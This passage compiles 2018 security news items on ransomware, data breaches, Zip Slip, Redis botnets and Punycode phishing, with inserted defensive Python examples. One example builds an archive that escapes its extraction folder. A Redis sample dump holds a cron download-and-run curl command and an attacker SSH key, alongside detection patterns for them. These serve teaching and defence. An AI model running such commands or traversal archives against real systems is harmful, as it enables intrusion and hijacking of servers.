Experts pointed out that the ransomware also infects users in the former USSR republics because many of them don’t use the Russian keyboard layout for political reasons. For this reason, the authors of the Sigrun ransomware decided to provide the decryption key to Russian-speaking victims for free.

“Ukranian users don’t use russian layout because of political reasons. So we decided to help them if they was infected,” the Sigrun author told BleepingComputer via email.

“We have already added avoiding Ukrainian layout like was in Sage ransomware before.” They also told us that the email images above are not from Sigrun but another ransomware.

Lawrence Abrams from BleepingComputer has spoken with the author of the malware, who told him that he isn’t from the former USSR republics.

“Finally, the Sigrun developer told us that they are “not from former USSR republics. I added it because of my Belarus partners.” added Abrams.

When Sigrun ransomware is executed on a computer, it scans it for files to encrypt; when it encrypts a file it appends the .sigrun extension to the encrypted file’s name. The malware creates two ransom notes named RESTORE-SIGRUN.txt and RESTORE-SIGRUN.html in each folder containing encrypted files.

Experts noticed that it doesn’t encrypt files that match certain extensions, filenames, or that are located in particular folders.

The ransom notes include information on the infection and payment instructions.
“At this time, the Sigrun Ransomware cannot be decrypted for free unless you are a Russian victim and the author helps you,” concluded Lawrence.

Further technical details, including IoCs, are reported in the analysis shared by BleepingComputer.

MyHeritage data breach – 92.3 million user credentials exposed
6.6.2018 securityaffairs Incident

A security researcher discovered email addresses and hashed passwords of roughly 92.3 million MyHeritage users stored on a private server outside the company.
The huge trove of data was contained in a file named after the company; according to the experts, the information is authentic and comes from MyHeritage.

“Today, June 4, 2018 at approximately 1pm EST, MyHeritage’s Chief Information Security Officer received a message from a security researcher that he had found a file named “myheritage” containing email addresses and hashed passwords, on a private server outside of MyHeritage.” reads the data breach notification published by the company.

“Our Information Security Team received the file from the security researcher, reviewed it, and confirmed that its contents originated from MyHeritage and included all the email addresses of users who signed up to MyHeritage up to October 26, 2017, and their hashed passwords.”

MyHeritage offers a service for investigating family history and reconstructing family trees through DNA analysis.


The expert who made the disconcerting discovery reported it to the company on June 4, 2018. The incident appears to affect users who signed up for the service on or before Oct. 26, 2017.

The expert only found email addresses and hashed passwords; no other information was discovered on the server hosting the file.

The company pointed out that passwords were not stored in plain text, but did not explain the hashing mechanism used to protect them.

MyHeritage handles billing information through third parties, while DNA data and other sensitive data are stored on segregated systems.

At the time of writing, the company had not observed any abuse of the compromised data.

“Since Oct 26, 2017 (the date of the breach) and the present we have not seen any activity indicating that any MyHeritage accounts had been compromised.” continues the notification.

“We believe the intrusion is limited to the user email addresses. We have no reason to believe that any other MyHeritage systems were compromised.”

The company set up an Information Security Incident Response Team to investigate the security breach and is going to hire a cybersecurity firm to conduct a comprehensive forensic investigation.

The company announced it is planning to introduce a two-factor authentication feature to provide further protection to its users.

“MyHeritage users who have questions or concerns about this incident can contact our security customer support team via email on privacy@myheritage.com or by phone via the toll-free number (USA) +1 888 672 2875, available 24/7.” concluded the company.

“For all registered users of MyHeritage, we recommend that for maximum safety, they change their password on MyHeritage.”

‘Zip Slip’ arbitrary file overwrite vulnerability affects thousands of projects
6.6.2018 securityaffairs

Security experts from British software firm Snyk have discovered a critical vulnerability, dubbed ‘Zip Slip’, that affects thousands of projects across many industries.
The flaw, which remained hidden for years, could be exploited by attackers to execute arbitrary code on vulnerable systems.

Zip Slip is an arbitrary file overwrite vulnerability that can be triggered with a directory traversal attack while extracting files from an archive.

Unfortunately, the issue affects extraction code for many archive formats, including tar, jar, war, cpio, apk, rar, and 7z.

“Zip Slip is a widespread arbitrary file overwrite critical vulnerability, which typically results in remote command execution.” states the blog post published by the experts.

“It was discovered and responsibly disclosed by the Snyk Security team ahead of a public disclosure on 5th June 2018, and affects thousands of projects, including ones from HP, Amazon, Apache, Pivotal and many more (CVEs and full list here).”

Thousands of projects written in several programming languages (e.g. JavaScript, Ruby, Java, .NET and Go), including ones from tech giants, include vulnerable libraries and code.

Attackers can trigger the Zip Slip flaw using a specially crafted archive file that holds directory traversal filenames (e.g. ../../evil.sh).
Once vulnerable code or a vulnerable library extracts the contents of the archive, the malicious files are written outside of the folder where they should reside.

“The premise of the directory traversal vulnerability is that an attacker can gain access to parts of the file system outside of the target folder in which they should reside. The attacker can then overwrite executable files and either invoke them remotely or wait for the system or user to call them, thus achieving remote command execution on the victim’s machine.” continues the analysis.

“The vulnerability can also cause damage by overwriting configuration files or other sensitive resources, and can be exploited on both client (user) machines and servers.”

The researchers published proof-of-concept Zip Slip archives and released a video PoC for the Zip Slip flaw.

Experts shared two sample malicious zip and tar files (for both Unix and Windows file systems) whose filenames cause a file to be extracted into the /tmp/ or \Temp\ folders.
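The bug and its fix are both one line of path handling, which the following added example makes concrete. It is not Snyk’s code or any of the affected libraries’: it builds a small archive in memory whose second entry is named ../../evil.sh (the same idea as the PoC archives), extracts it with a routine that trusts entry names, the Zip Slip pattern, and then with a hardened routine that resolves every entry against the destination and refuses the archive if any resolved path leaves it. The extraction runs inside a scratch directory two levels deep so the escaped file stays inside the scratch tree; the archive contents are constructed.

```python
import io
import os
import tempfile
import zipfile


def build_malicious_zip():
    """Constructed sample archive: one benign entry plus one whose name climbs
    out of the extraction directory, the same trick as Snyk's PoC archives."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("readme.txt", "harmless\n")
        zf.writestr("../../evil.sh", "#!/bin/sh\necho pwned\n")
    return buf.getvalue()


def extract_vulnerable(zip_bytes, dest):
    """The Zip Slip pattern: the entry name is joined to dest and written
    as-is, so '../../evil.sh' lands two directories above dest."""
    written = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            target = os.path.join(dest, info.filename)
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with open(target, "wb") as fh:
                fh.write(zf.read(info))
            written.append(os.path.realpath(target))
    return written


def is_safe_entry(dest, name):
    """True only if name, resolved against dest, stays inside dest. Catches
    '../' runs, absolute names and dot-segments hidden in the middle."""
    dest_real = os.path.realpath(dest)
    target = os.path.realpath(os.path.join(dest_real, name))
    return os.path.commonpath([dest_real, target]) == dest_real


def extract_hardened(zip_bytes, dest):
    """Validate every entry name before writing anything, then extract."""
    dest_real = os.path.realpath(dest)
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        infos = zf.infolist()
        bad = [i.filename for i in infos if not is_safe_entry(dest_real, i.filename)]
        if bad:
            raise ValueError("Zip Slip attempt blocked: %r" % bad)
        written = []
        for info in infos:
            target = os.path.realpath(os.path.join(dest_real, info.filename))
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with open(target, "wb") as fh:
                fh.write(zf.read(info))
            written.append(target)
    return written


def demo():
    """Run both extractors in a scratch tree and report where the traversal
    entry ended up; the hardened one must refuse the archive entirely."""
    base = os.path.realpath(tempfile.mkdtemp(prefix="zipslip-"))
    dest = os.path.join(base, "a", "b")  # two levels down, so '../..' stays in base
    zip_bytes = build_malicious_zip()
    inside = os.path.realpath(dest) + os.sep
    escaped = [p for p in extract_vulnerable(zip_bytes, dest) if not p.startswith(inside)]
    try:
        extract_hardened(zip_bytes, os.path.join(base, "safe"))
        blocked = False
    except ValueError:
        blocked = True
    return {"escaped": [os.path.relpath(p, base) for p in escaped], "blocked": blocked}


if __name__ == "__main__":
    print(demo())  # {'escaped': ['evil.sh'], 'blocked': True}
```

Two details matter in the hardened version: it validates all names before writing anything, so a rejected archive leaves no partial extraction behind, and it compares real paths, so a symlink inside the destination cannot be used to redirect the write. Tar extractors need one extra check the zip case does not show, because a tar entry can itself be a symlink pointing outside the destination.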

Since April, Snyk has privately reported the flaw to the maintainers of all vulnerable libraries and projects. It also maintains a GitHub repository listing all affected projects; the repository is open to contributions from the wider community to ensure it holds the most up-to-date status.

HR Software company PageUp victim of a Data Breach, experts fear a domino effect
6.6.2018 securityaffairs Incident

HR software firm PageUp is the latest victim of a data breach; the company has 2.6 million active users across over 190 countries.
Another day, another data breach makes the headlines. This time the victim is the HR software firm PageUp, an Australian company with 2.6 million active users across over 190 countries.

The company notified its customers of the incident, informing them that it has launched a forensic investigation with support from an independent third-party firm.

The company has reported the breach to law enforcement and data regulators in Australia and the United Kingdom.

According to the firm, on May 28 its investigation found indications that attackers had accessed internal records that may contain customer data, including names, contact information, usernames, and password hashes. Other sensitive data, including signed employment contracts and resumes, are not affected because they are stored on servers that were not touched by the security breach.

“On May 23, 2018, PageUp detected unusual activity on its IT infrastructure and immediately launched a forensic investigation. On May 28, 2018 our investigations revealed that we have some indicators that client data may have been compromised, a forensic investigation with assistance from an independent 3rd party is currently ongoing.” reads the data breach notification published by the company.

“There is no evidence that there is still an active threat, and the jobs website can continue to be used. All client user and candidate passwords in our database are hashed using bcrypt and salted, however, out of an abundance of caution, we suggest users change their password,”

At the time, the firm did not disclose technical details about the security breach; it only confirmed that its systems were infected by malware.

“we can share that the source of the incident was a malware infection. The malware has been eradicated from our systems and we have confirmed that our anti-malware signatures can now detect the malware. We see no further signs of malicious or unauthorised activity and are confident in this assessment.” continues the notification.

Just after the news of the breach, some of the companies that use the PageUp service shut down their online recruitment pages and notified job applicants.

According to Australia Post, data potentially impacted by the incident may include:

Bank details
Tax File Number and superannuation details
Diversity information
Emergency contact information
Conditions of offer and employment
Mobile phone number
Questions relevant to the job such as if you have Work Rights or an Australian citizenship
Education and work experience
License number

After the incident, the Australian telecoms giant Telstra suspended its online recruitment and notified applicants of the issue.

“The online recruitment system we use is currently unavailable.
We are aware of a security incident with one of our vendors, PageUp, a company that provides us software services used as part of our employee recruitment processes.” states the security advisory published by Telstra.

“We are among a number of organisations who use PageUp. PageUp has provided more information here. We have held discussions with PageUp to understand any possible impact to the security of the services they provide”

Unfortunately, many other organizations may have been impacted by the incident.

Imperva’s research shows 75% of open Redis servers are infected
3.6.2018 securityaffairs

According to the security experts at Imperva, three open Redis servers out of four are infected with malware.
The discovery is the result of analysis conducted by running Redis-based honeypot servers for several months.

Since their initial report on the RedisWannaMine attack that propagates through open Redis and Windows servers, the experts from Imperva have discovered a new wave of attacks against Redis servers exposed online without authentication.

One of the most common attacks against Redis servers consists of adding SSH keys, so the attacker can remotely access the machine and take it over.

“Having let our honeypot collect data for some time, we noticed that different attackers use the same keys and/ or values to carry out attacks.” states the report published by the experts.

“As such, a shared key or value between multiple servers is a clear sign of a malicious botnet activity.”

The experts used the SSH keys they’ve collected through their honeypot to scan Redis servers that were left exposed online for the presence of these keys.

The experts obtained a list of over 72,000 Redis servers available online by using the Shodan query ‘port:6379’; over 10,000 of these responded to the scan request without error, allowing the researchers to check them for the keys and values collected from the honeypot.


The discovery was disconcerting: more than three-quarters of the responding Redis servers held keys or values associated with botnet activity.

“Unsurprisingly, more than two-thirds of the open Redis servers contain malicious keys and three-quarters of the servers contain malicious values, suggesting that the server is infected.” continues the report.

“Also according to our honeypot data, the infected servers with “backup” keys were attacked from a medium-sized botnet ( ) located at China (86% of IPs).”

Imperva also revealed that its customers were attacked more than 75,000 times by 295 IPs running publicly accessible Redis servers, meaning that threat actors are abusing vulnerable installs to build their botnets and launch a broad range of attacks (SQL injection, cross-site scripting, malicious file uploads, remote code execution, etc.).

The “crackit” key listed in Imperva’s table has been used since at least 2016 by a known threat actor to spread ransomware and blackmail the owners of the compromised servers.

The main problem with Redis servers is that owners often ignore that Redis is not securely configured by default, because it is designed to operate inside trusted, closed networks.

Below are some recommendations for admins operating Redis servers:

Make sure you follow Redis Security notes, i.e.
Don’t expose your Redis to the internet
If possible, apply authentication
Don’t store sensitive data in clear text
Monitor your Redis server to make sure it is not infected.
You can monitor processes or CPU consumption to check if a crypto mining malware is running. You can also use the keys and values mentioned in the tables above to monitor the data stored in your Redis server.
Make sure you run Redis with the minimal privileges necessary. Running it with root user, for example, is a bad practice, since it greatly increases the potential damage that an attacker can cause.
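The recommendations above translate into a handful of redis.conf directives, and the key-and-value monitoring into a few patterns. The following is an added example, not Imperva’s tooling: it audits a redis.conf text for the settings that make the attacks described here possible (an exposed bind address, protected mode off, no or short AUTH password, and the CONFIG command left enabled, since CONFIG SET dir plus CONFIG SET dbfilename followed by SAVE is the usual way an attacker writes the dataset into ~/.ssh/authorized_keys or a cron directory) and then scans a key/value listing for the “crackit” and “backup” key names quoted above and for values that look like SSH public keys or download-and-run cron lines. The key-name suffix, the value heuristics and the list of commands to rename are assumptions; both configuration fragments and the key listing are constructed samples.

```python
import re

# Commands the honeypot attacks lean on: CONFIG SET dir/dbfilename + SAVE let
# an attacker drop the dataset into ~/.ssh/authorized_keys or /etc/cron.d.
# Which commands to rename is an assumption; adjust to what the app needs.
COMMANDS_TO_DISABLE = ("config", "debug", "flushall", "flushdb")
ALL_INTERFACES = {"0.0.0.0", "::", "*"}


def parse_conf(text):
    """Last-wins map of directive -> args, plus the rename-command pairs.
    Comments and blank lines are skipped."""
    conf, renames = {}, []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        name, *args = line.split()
        if name.lower() == "rename-command" and len(args) == 2:
            renames.append((args[0].lower(), args[1]))
        else:
            conf[name.lower()] = args
    return conf, renames


def audit_redis_conf(text):
    """Return a list of findings; an empty list means every check passed."""
    conf, renames = parse_conf(text)
    findings = []
    binds = conf.get("bind", [])
    if not binds or ALL_INTERFACES & set(binds):
        findings.append("bind: listening on all interfaces; bind to 127.0.0.1 or an internal address")
    # protected-mode defaults to yes on Redis 3.2+; older versions lack it entirely.
    if (conf.get("protected-mode") or ["yes"])[0].lower() != "yes":
        findings.append("protected-mode: disabled")
    password = (conf.get("requirepass") or [""])[0]
    if not password:
        findings.append("requirepass: no AUTH password set")
    elif len(password) < 32:
        findings.append("requirepass: short password; AUTH is fast to brute-force, use a long random one")
    renamed = {old for old, _ in renames}
    for cmd in COMMANDS_TO_DISABLE:
        if cmd not in renamed:
            findings.append("%s: not renamed or disabled" % cmd.upper())
    return findings


# Key names from the honeypot data quoted above; the numeric suffix and the
# value heuristics are assumptions.
SUSPICIOUS_KEY_RE = re.compile(r"^(crackit|backup\d*)$", re.I)
SUSPICIOUS_VALUE_RES = (
    re.compile(r"ssh-(rsa|ed25519|dss|ecdsa)\s+AAAA"),      # SSH public key
    re.compile(r"\*/\d+\s+\*\s+\*\s+\*\s+\*"),               # every-N-minutes cron line
    re.compile(r"\b(curl|wget)\b[^\n]*\|\s*(ba)?sh\b"),       # download-and-run
)


def suspicious_keys(dump):
    return [k for k in dump if SUSPICIOUS_KEY_RE.match(k)]


def suspicious_values(dump):
    return [k for k, v in dump.items() if any(r.search(v) for r in SUSPICIOUS_VALUE_RES)]


EXPOSED_CONF = """# constructed sample: the shape of an exposed server
bind 0.0.0.0
protected-mode no
port 6379
"""

HARDENED_CONF = """# constructed sample: the same server after applying the advice above
bind 127.0.0.1
protected-mode yes
requirepass 7f3c9b1e5a2d4c6e8b0a9f1d3e5c7b9a2d4f6e8c0b1a3d5f
rename-command CONFIG ""
rename-command DEBUG ""
rename-command FLUSHALL ""
rename-command FLUSHDB ""
"""

SAMPLE_DUMP = {  # constructed key/value listing of an infected instance
    "session:42": "eyJ1c2VyIjoiYWxpY2UifQ==",
    "crackit": "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQAB...constructed attacker@evil\n\n\n",
    "backup1": "\n\n*/1 * * * * curl -fsSL http://203.0.113.5/x.sh | sh\n\n",
    "user:1": "alice",
}

if __name__ == "__main__":
    for finding in audit_redis_conf(EXPOSED_CONF):
        print("exposed:", finding)
    print("hardened:", audit_redis_conf(HARDENED_CONF) or "no findings")
    print("suspicious keys:", suspicious_keys(SAMPLE_DUMP), suspicious_values(SAMPLE_DUMP))
```

The leading and trailing newlines in the sample values are not decoration: an RDB dump is a binary file, and the attacker pads the key value so that the authorized_keys parser skips the surrounding garbage and still finds a clean ssh-rsa line.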

Crooks included the code for CVE-2018-8174 IE Zero-Day in the RIG Exploit Kit
3.6.2018 securityaffairs

Cyber criminals recently added the code for the CVE-2018-8174 Internet Explorer zero-day vulnerability to the infamous RIG exploit kit.
Crooks recently added the code for an Internet Explorer zero-day vulnerability to the infamous RIG exploit kit.

The Internet Explorer zero-day vulnerability, tracked as CVE-2018-8174, was first discovered a few weeks ago; it affects the VBScript engine used by Internet Explorer and Microsoft Office.

Researchers from the Advanced Threat Response Team of Qihoo 360’s Core Security Division first reported the zero-day.

In May, the Advanced Threat Response Team of 360 Core Security Division detected an APT attack exploiting a 0-day vulnerability and captured the world’s first malicious sample that uses it. The experts codenamed the exploit “Double Kill”.

Qihoo 360 researchers reported the vulnerability to Microsoft that addressed the flaw in the May 2018 Patch Tuesday security updates.

After the release of the security updates, on May 8, experts from Kaspersky Lab and Malwarebytes published a detailed analysis of the vulnerability, while researchers from Morphisec security firm released a proof-of-concept (PoC) code.

Once the PoC code was available online, a Metasploit module for the exploitation of CVE-2018-8174 followed.

The availability of PoC code for a vulnerability is a gift for malware authors; in this specific case, the crooks included the code for the CVE-2018-8174 flaw in the RIG exploit kit.

“A Proof of Concept for Internet Explorer 11 on Windows 7 has been shared publicly 3 days ago, it’s now being integrated in Browser Exploit Kits.” wrote the security researcher Kafeine.

“This will replace CVE-2016-0189 from july 2016 and might shake the Drive-By landscape for the coming months.”


Researchers from Trend Micro also observed that the RIG Exploit Kit is now leveraging CVE-2018-8174 to deliver a Monero cryptocurrency miner.

“Along with updates in code, we also observed Rig integrating a cryptocurrency-mining malware as its final payload.” reads the analysis from Trend Micro.

“Based on the latest activities we’ve observed from Rig, they’re now also exploiting CVE-2018-8174, a remote code execution vulnerability patched in May and reported to be actively exploited.”

Cyber criminals hijacked the traffic of legitimate sites and redirected IE users to compromised websites hosting the RIG exploit kit. The RIG exploit kit was used to drop the Smoke Loader malware, a tiny dropper used to install a cryptocurrency miner on the infected system.

Tens of Vulnerabilities Found in Quest Appliances
3.6.2018 securityweek

Researchers at Core Security say they have discovered a total of more than 60 vulnerabilities in disk backup and system management appliances from Quest. The IT management firm has released patches, but threatened to take legal action against Core if it disclosed too many details.

More than 50 security holes have been found in Quest’s DR series disk backup appliances. The most serious of the flaws, according to Core, allows a remote and unauthenticated attacker to execute arbitrary system commands via the “password” parameter of the login process.

Experts also identified 45 other command injection issues in the product, but these require authentication. Core also claims to have uncovered six privilege escalation vulnerabilities that allow an attacker to gain root permissions.

The weaknesses impact Quest DR Series Disk Backup software version 4.0.3 and possibly earlier, and they have been patched with the release of version

A separate advisory from Core describes 11 flaws affecting Quest’s KACE Systems Management Appliance. Researchers found that the product’s web console is affected by three command injection vulnerabilities, including one that can be exploited by an unauthenticated attacker.

The list of security holes found in this product also includes privilege escalation, SQL injection, cross-site scripting (XSS), and path traversal issues.

The vulnerabilities have been patched with a hotfix that is available for Quest KACE System Management Appliance versions 7.0, 7.1, 7.2, 8.0, and 8.1.

During the disclosure of the KACE flaws, Quest told Core that its work is in breach of the vendor’s license agreement and asked the security firm not to make its findings public to avoid legal action.

Quest, whose products are reportedly used by 130,000 companies, does have a responsible disclosure policy, but it states that reports of any vulnerability are considered the company’s confidential and proprietary information and cannot be disclosed to third parties.

Core has only published limited information about each of the vulnerabilities, but the company says it’s disappointed by Quest’s posture on disclosure.

“CoreLabs has been publishing security advisories since 1997 and believes in coordinated disclosure and good faith collaboration with software vendors before disclosure to help ensure that a fix or workaround solution is ready and available when the vulnerability details are publicized. We believe that providing technical details about each finding is necessary to provide users and organizations with enough information to understand the implications of the vulnerabilities against their environment and, most importantly, to prioritize the remediation activities aiming at mitigating risk,” Core said.

Hardcoded Credentials Expose Yokogawa Controllers to Attacks
3.6.2018 securityweek Attack

Japanese electrical engineering company Yokogawa has released firmware updates for its STARDOM controllers to address a critical vulnerability that can be exploited remotely to take control of the device.

Yokogawa’s STARDOM FCJ, FCN-100, FCN-RTU and FCN-500 controllers running firmware version R4.02 or earlier have a hardcoded username and password that can be used by an attacker with access to the network to log in to the device and execute system commands.

The flaw is tracked as CVE-2018-10592 and it has been rated critical by both ICS-CERT and Yokogawa itself. The issue was discovered by VDLab, an industrial cybersecurity lab set up by Chinese companies Venustech and Dongfang Electric.

The vendor patched the vulnerability with the release of version R4.10. Customers have been advised to update the firmware on their devices and also implement overall security measures to protect their systems.


The FCN-500 product has been designed for high reliability and speed, and it includes features designed to ensure that processes are not interrupted even if a module is replaced. The FCN-RTU model is designed for inhospitable locations where low power consumption is needed. The products are used worldwide in the energy, critical manufacturing, and food and agriculture sectors. The FCJ and FCN-100 models were discontinued in mid-2016.

Yokogawa has published a total of four security advisories this year. One published in January warns customers that CENTUM and Exaopc products are affected by a vulnerability that allows a local attacker to trigger false system and process alarms, and prevent alarm notifications from being displayed to the user.

An advisory from late April describes authentication bypass and denial-of-service (DoS) flaws affecting Vnet/IP switches. The company has also alerted customers to the risks introduced by the use of the Intel Management Engine, which has several potentially serious vulnerabilities.

Punycode Makes SMiShing Attacks More Deceiving
2.6.2018 securityweek Attack

Phishing attacks carried out via text messages that use the “Punycode” technique to make nefarious URLs look legitimate are becoming more popular, cloud security firm Zscaler says.

Referred to as SMiShing, SMS phishing is a technique where attackers use text messages in an attempt to trick users into clicking a link that usually leads to malware or asks for sensitive information from the victims.

Recently, cybercriminals engaged in SMiShing campaigns started using Punycode-encoded domains (mounting what is known as a homograph attack) to deceive users into believing they are accessing a legitimate link. Specifically, the attackers replace one or more characters in the domain name with similar-looking Unicode characters; the resulting internationalized domain name is registered in its Punycode (“xn--”) form, and a browser that displays the decoded form shows the lookalike.

Attacks leveraging Punycode are not new and have targeted Office 365 business users as well as Chrome and Firefox users, but only recently have they started occurring more frequently in text message attacks.

SMiShing has been on the rise since the beginning of the year, and the adoption of new techniques clearly makes it an important threat.

The use of Punycode as part of SMiShing campaigns increases the chances of a successful compromise, as mobile phone users are unlikely to notice the modified URL.

In one of the observed incidents, the unsuspecting user received a WhatsApp message pretending to be a link to a Jet Airways offer of free air tickets. Although it looked like the real jetairways.com website, the link used a homograph, taking the user to xn--jetarways-ypb.com instead.

If the link is accessed on an iPhone, Safari attempts to load the phishing website without displaying the real link. Chrome on Android, however, displays the real link (it shows the URL in Punycode format) instead.

“The Web browsers decide whether to display the IDN or Punycode format based on conditions like the presence of certain characters which can spoof the separators like "." or "/", determining whether all characters come from same language, if characters belong to allowable combinations or by checking if the domain belongs to whitelisted TLDs,” Zscaler explains.
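The browser heuristics quoted above are the same ones a security team can apply to links before they reach a user. The following is an added example, not Zscaler’s code: it Punycode-decodes the xn-- labels of a hostname with Python’s built-in punycode codec, reduces the registrable label to an ASCII “skeleton” (accents stripped, a hand-picked set of confusable characters mapped to their Latin lookalikes) and flags the host when the skeleton matches a watchlisted brand but the decoded label does not. The confusables subset and the simple name.tld assumption are mine; production code should load Unicode’s confusables.txt and a public-suffix list. The Jet Airways domain is the one from the article; the PayPal example and the text message are constructed.

```python
import re
import unicodedata

# Hand-picked confusables for this demo (an assumption; production code should
# load Unicode's confusables.txt). Accented Latin letters are handled by NFKD.
CONFUSABLES = {
    "\u0131": "i",  # LATIN SMALL LETTER DOTLESS I (the Jet Airways case)
    "\u0430": "a",  # CYRILLIC SMALL LETTER A
    "\u0435": "e",  # CYRILLIC SMALL LETTER IE
    "\u043e": "o",  # CYRILLIC SMALL LETTER O
    "\u0440": "p",  # CYRILLIC SMALL LETTER ER
    "\u0441": "c",  # CYRILLIC SMALL LETTER ES
    "\u0443": "y",  # CYRILLIC SMALL LETTER U
    "\u0445": "x",  # CYRILLIC SMALL LETTER HA
    "\u0455": "s",  # CYRILLIC SMALL LETTER DZE
    "\u0456": "i",  # CYRILLIC SMALL LETTER BYELORUSSIAN-UKRAINIAN I
    "\u0458": "j",  # CYRILLIC SMALL LETTER JE
}

URL_HOST_RE = re.compile(r"https?://([^/\s:?#]+)", re.I)


def decode_label(label):
    """Punycode-decode one 'xn--' label; other labels are returned unchanged."""
    if label.startswith("xn--"):
        return label[4:].encode("ascii").decode("punycode")
    return label


def decode_host(host):
    return ".".join(decode_label(label) for label in host.strip().lower().split("."))


def skeleton(text):
    """ASCII skeleton of a label: drop combining marks (so 'é' -> 'e') and map
    the confusables above; anything else is kept as-is."""
    out = []
    for ch in unicodedata.normalize("NFKD", text):
        if unicodedata.combining(ch):
            continue
        out.append(CONFUSABLES.get(ch, ch))
    return "".join(out).lower()


def homograph_check(host, watchlist):
    """Decode host and compare the registrable label's skeleton with the
    watchlist. Assumes a plain <name>.<tld> shape (no public-suffix list)."""
    decoded = decode_host(host)
    labels = decoded.split(".")
    registrable = labels[-2] if len(labels) >= 2 else labels[0]
    skel = skeleton(registrable)
    watched = {w.lower() for w in watchlist}
    # A hit needs the skeleton to match a brand AND the real label to differ:
    # the genuine brand domain has skeleton == label and is not flagged.
    homograph_of = skel if (skel in watched and registrable != skel) else None
    return {"host": host, "decoded": decoded, "registrable": registrable,
            "skeleton": skel, "non_ascii": any(ord(c) > 127 for c in registrable),
            "homograph_of": homograph_of}


def check_message(text, watchlist):
    """Run the check on every URL host found in a text message."""
    return [homograph_check(h, watchlist) for h in URL_HOST_RE.findall(text)]


# Constructed sample message carrying the domain from the article.
SAMPLE_SMS = "Jet Airways is giving away free tickets! Claim yours: http://xn--jetarways-ypb.com/free"

if __name__ == "__main__":
    for result in check_message(SAMPLE_SMS, ["jetairways", "paypal"]):
        print(result)
```

Decoding xn--jetarways-ypb yields “jetaırways” (a dotless i, U+0131, in place of the i), whose skeleton collapses back to “jetairways”; that difference between the decoded label and its skeleton is precisely what a user scanning the SMS cannot see.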

The domain used as part of the observed attack was newly registered, within the last two weeks, the researchers say. They also note that, after being served the phishing page, victims are redirected to another domain, newuewfarben[.]com, which can be used to serve malware.

“SMiShing has been on a rise in year 2018 and the addition of homograph technique will continue to make it more effective against unsuspecting mobile users. Web browsers have implemented protections against homograph attacks, but because of the legitimate use of Punycode characters, it becomes very difficult for the developers to implement a foolproof fix. Attackers leverage this to work around the rules and create homographs which are displayed as IDNs despite being malicious in nature,” Zscaler concludes.

WordPress Disables Plugins That Expose e-Commerce Sites to Attacks
2.6.2018 securityweek Vulnerability

Researchers discovered vulnerabilities in ten WordPress plugins made by a company for e-commerce websites powered by the WooCommerce platform. WordPress disabled many of them after the developer failed to release patches.

WordPress security firm ThreatPress reported on Thursday that its researchers discovered various types of flaws in ten plugins from Multidots. The impacted plugins are available through WordPress.org and they allow WooCommerce users to manage different aspects of their online shops.

The vulnerable plugins have nearly 20,000 active installs, including 10,000 installations of Page Visit Counter, 3,000 installations of WooCommerce Category Banner Management, and 2,000 installations of WooCommerce Checkout for Digital Goods.

Experts discovered that the plugins made by Multidots are impacted by stored cross-site scripting (XSS), cross-site request forgery (CSRF) and SQL injection vulnerabilities that could be exploited to take complete control of impacted e-commerce sites.

According to researchers, attackers could deface websites, execute remote shells, plant keyloggers, and upload cryptocurrency miners or other types of malware. Attackers may be able to gain access to valuable information considering that the affected websites are online shops that collect personal and financial information.

“The vulnerabilities allow an unauthenticated attacker to inject malicious JavaScript, and thus provide the opportunity to hijack clients’ credit cards data and to receive clients’ and administrator’s logins,” ThreatPress’s Rasa Adams told SecurityWeek.

While exploitation in many cases requires the victim to access a specially crafted URL or visit a certain page, some of the flaws can be exploited without any user interaction.

Multidots was informed of the vulnerabilities on May 8 and confirmed the issues. However, after seeing that the developer failed to take any action, ThreatPress notified WordPress, which decided to disable a majority of the impacted plugins.

SecurityWeek reached out to Multidots for comment before ThreatPress made its findings public, but the company has not responded.

CVE identifiers have been assigned to four of the vulnerabilities and ThreatPress says it expects more to be assigned. The identifiers assigned to date are CVE-2018-11579, CVE-2018-11580, CVE-2018-11633 and CVE-2018-11632.

ThreatPress has published technical details and proof-of-concept (PoC) code for each of the vulnerabilities.

“It’s good to know that WordPress Security reacts quickly, but still, we have a big problem. There is no way to inform all users of these plugins about the threat,” Adams said in a blog post. “It’s strange that WordPress can show you information about available updates, but still can’t protect you by providing the information about closed plugins in the same way. We hope to see some changes in this area. In this case, we could notify owners of affected websites and secure almost twenty thousand websites.”

Flaws in Multidots WordPress Plugins expose e-Commerce websites to a broad range of attacks
2.6.2018 securityaffairs

Researchers at security firm ThreatPress discovered vulnerabilities in ten WordPress plugins developed by Multidots, a company that builds plugins for e-commerce websites.
The vulnerable plugins are available on WordPress.org and implement features that let admins manage WooCommerce-based online shops; nearly 20,000 WordPress installs currently use them.

“Recently our research team found serious security issues in ten WordPress plugins developed by the same vendor – MULTIDOTS Inc. company. All vulnerable plugins designed to work alongside with WooCommerce so there is a real threat to all online stores powered by WooCommerce and one of these plugins.” reads a blog post published by ThreatPress.

“We found Stored Cross-Site Scripting (XSS), Cross-Site Request Forgery and SQL Injection vulnerabilities that could be exploited by hackers to upload keyloggers, shells, crypto miners and other malicious software or completely deface the website.”


Multidots plugins are affected by stored cross-site scripting (XSS), cross-site request forgery (CSRF) and SQL injection vulnerabilities that could be exploited by an attacker to take complete control of e-commerce installs.

The flaws are tracked as CVE-2018-11579, CVE-2018-11580, CVE-2018-11633 and CVE-2018-11632. They could allow attackers to carry out a broad range of attacks, such as installing cryptocurrency miners or exploit kits to deliver malware.

Experts warn that some vulnerabilities could be exploited without any user interaction.

ThreatPress reported the flaws to Multidots on May 8; the company acknowledged them but, at the time of writing, had not fixed them.

ThreatPress published technical details and proof-of-concept (PoC) code for each of the vulnerabilities.

“It’s good to know that WordPress Security reacts quickly, but still, we have a big problem. There is no way to inform all users of these plugins about the threat,” Adams said in a blog post. “It’s strange that WordPress can show you information about available updates, but still can’t protect you by providing the information about closed plugins in the same way. We hope to see some changes in this area. In this case, we could notify owners of affected websites and secure almost twenty thousand websites.”

Crashing HDDs by launching an attack with sonic and ultrasonic signals

2.6.2018 securityaffairs Attack

A team of researchers from the University of Michigan and Zhejiang University has devised a method to cause physical damage to hard drives by using sonic and ultrasonic signals.
An attacker only needs to play ultrasonic sounds through the built-in speaker of the target computer, or through a speaker in its proximity.

The principle is simple: the technique uses specially crafted acoustic signals to cause significant vibrations in the HDD's components, which can result in severe damage.

